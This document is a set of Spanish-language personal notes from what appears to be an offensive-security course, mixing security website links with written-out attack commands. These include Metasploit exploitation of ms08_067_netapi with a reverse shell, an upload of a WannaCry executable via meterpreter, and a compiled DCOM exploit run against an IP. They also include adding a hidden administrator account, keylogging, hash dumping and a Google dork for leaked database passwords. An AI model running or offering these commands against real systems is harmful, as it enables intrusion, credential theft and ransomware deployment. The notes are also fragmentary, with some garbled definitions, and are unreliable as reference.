Drive by Download--> Al dar click se ejecuta un proceso

Malware Avanzado es poliformico,mutante, ataque diferente.

Ramsonware

www.zone-h.org indicadores
https://www.openbugbounty.org/
hackertarget.com
darkreading.com
lists.astaro.com
Crimeware--> desarrollo de software malicioso

www.owasp.org
Broken Authentication
Se debe forzar un logon para cada request

El malware atraviesa todas las capas del modelo OSI.

www.chkrootkit.org
veriato.com monitoreo de empleados
blackhat.com

Pwn2Own concurso de hacking

DARKODE.COM
malwarebytes.com
Windows sysinternals

hardzone.es

intext:DB_PASSWORD || intext:"MySQL hostname" ext:txt

haveibeenpwred.

fastcompany.com
https://www.exploit-db.com/google-hacking-database/9/
http://securityalert.knowem.com/

https://www.offensive-security.com/metasploit-unleashed/mimikatz/

project-rainbowcrack.com

ssl strip -------> para obtener certificado digital

#setoolkit

www.darkreading.com
https://www.schneier.com/
skimmer : fraude a cajero automatico

https://www.cybrary.it/

Chema Alonso Eleven Paths

ancalog.tech
rusploit.com
ofex-exploit.com

Marcus Hutchins
Shadow Broken

shodan.io scanner online

rdesktop -u 199.130.9.35

http://www.irongeek.com/

invicea --> FBI

BTS NSS Lab

www.tripwire.com gratis para linux

Sheila A. Berta

msf exploit>exploit
meterpreter> upload -f wannacry_original.exe

icono metexploit
service postgresql start
service postgresql status

actualiza DB, cerrar ventana

abrir terminal y ejecutar msfconsole

smashing the modern stack Paper .oO Phrak

Compilar fuente gcc -o dcom-attack dcom.c

./dcom-attack 0 172.16.1.51

Zenmap scanner de red

Agrega Usuario
net user mario add

PlugBot - - Hardware hacker

BulletProof

Search iis
Search Oracle
search decom

use exploit windows/smb.

show options

Set payload windows/ (TAB)

Set payload windows/ command
set RHOST 192.168.1.1
show options
set USER username
set PASS mypassword
exploit
=========================================================================
msfconsole
db_status
search netapi
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/shell/reverse_tcp
show options
set LHOST 192.168.200.129 KALI
set RHOST 192.168.200.130
exploit

c> net user cabron joder /ADD

c> net locagroup cabron administrators /ADD

=========================================================================
apt-get update && apt-get upgrade && apt-get dist upgrade

chroot runs (enjaulado o confinado)

si se ejecuta exploit sin seleccionar PAYLOAD

meterpreter>
background ejecuta el proceso en batch
session -l despliega el canal
ps -> ver procesos
ps -ef
pstree -> visualiza arbol de procesos
getpid -> muestra el proceso donde esta alojado el metaexploit
migrate 1712 -> migra a otro proceso, eje explorer

session -i <canal 1,2,3.> selecciona el canal

keyscan_start
keyscan_dump
keyscan_stop
background
use post/windows/capture/key
hashdump

rainbow table cracking tool

crackstatios.net

shell

run keylogrecorder

meterpreter
download
pwd
lpwd
download -r C:\\WINDOWS\\system32\\xcopy.exe

=====================================================================
Instalar vmware tools
cp /media/cdrom0/VMware-tools... /etc/VMware-toos
/opt/vmware-tools/
tar -zxvf VMwaretools....tar.gz
cd VMware-Tools# ./vmware_install

====================================================================

set PAYLOAD windows/meterpreter/bind_tcp